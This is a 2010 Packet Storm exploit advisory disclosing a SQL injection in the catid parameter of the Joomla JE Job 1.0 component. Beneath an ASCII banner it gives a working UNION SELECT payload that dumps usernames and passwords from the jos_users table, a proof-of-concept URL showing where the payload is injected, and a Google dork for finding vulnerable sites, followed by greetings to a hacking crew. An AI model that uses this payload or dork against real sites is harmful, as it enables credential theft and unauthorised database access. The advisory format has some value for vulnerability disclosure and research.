Joomla JE Job 1.0 SQL Injection

2010-05-28T00:00:00
ID PACKETSTORM:90067
Type packetstorm
Reporter v3n0m
Modified 2010-05-28T00:00:00

Description

                                        
                                            ` ) ) ) ( ( ( ( ( ) )   
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(   
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())  
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\   
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)  
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ /   
\ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <   
|_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\  
.WEB.ID  
-----------------------------------------------------------------------  
Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability  
-----------------------------------------------------------------------  
Author : v3n0m  
Site : http://yogyacarderlink.web.id/  
Date : May, 29-2010  
Location : Jakarta, Indonesia  
Time Zone : GMT +7:00  
----------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application : JE Job  
Vendor : http://joomlaextensions.co.in/  
License : GPLv2  
Version : 1.0 Lower versions may also be affected  
Google Dork : inurl:com_jejob  
  
User can search the job by Location or by Job Title or by Experience. User can   
also see the job category at the front page. Category wise jobs are displayed in it.  
----------------------------------------------------------------  
  
Exploitz:  
~~~~~~~  
-9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5+from+jos_users--  
  
  
SQLi p0c:  
~~~~~~~  
  
http://127.0.0.1/[path]/index.php?option=com_jejob&view=item&catid=[SQLi]  
----------------------------------------------------------------  
  
Shoutz:  
~~~~  
  
- 'malingsial banyak cakap, you skill off bullshit on '  
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-  
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag  
- kiddies,whitehat,mywisdom,yadoy666,udhit  
- c4uR (besok² klo curhat jangan nangis lagi ah uR bruakakaka)  
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)  
- elicha cristia [ Mizz U so much... ]  
- Joss [at] hack0wn.com  
- #yogyacarderlink @irc.dal.net  
----------------------------------------------------------------  
Contact:  
~~~~  
  
v3n0m | YOGYACARDERLINK CREW | v3n0m666[at]live[live]com  
Homepage: http://yogyacarderlink.web.id/  
http://v3n0m.blogdetik.com/  
http://elich4.blogspot.com/ << Update donk >_<  
  
---------------------------[EOF]--------------------------------  
`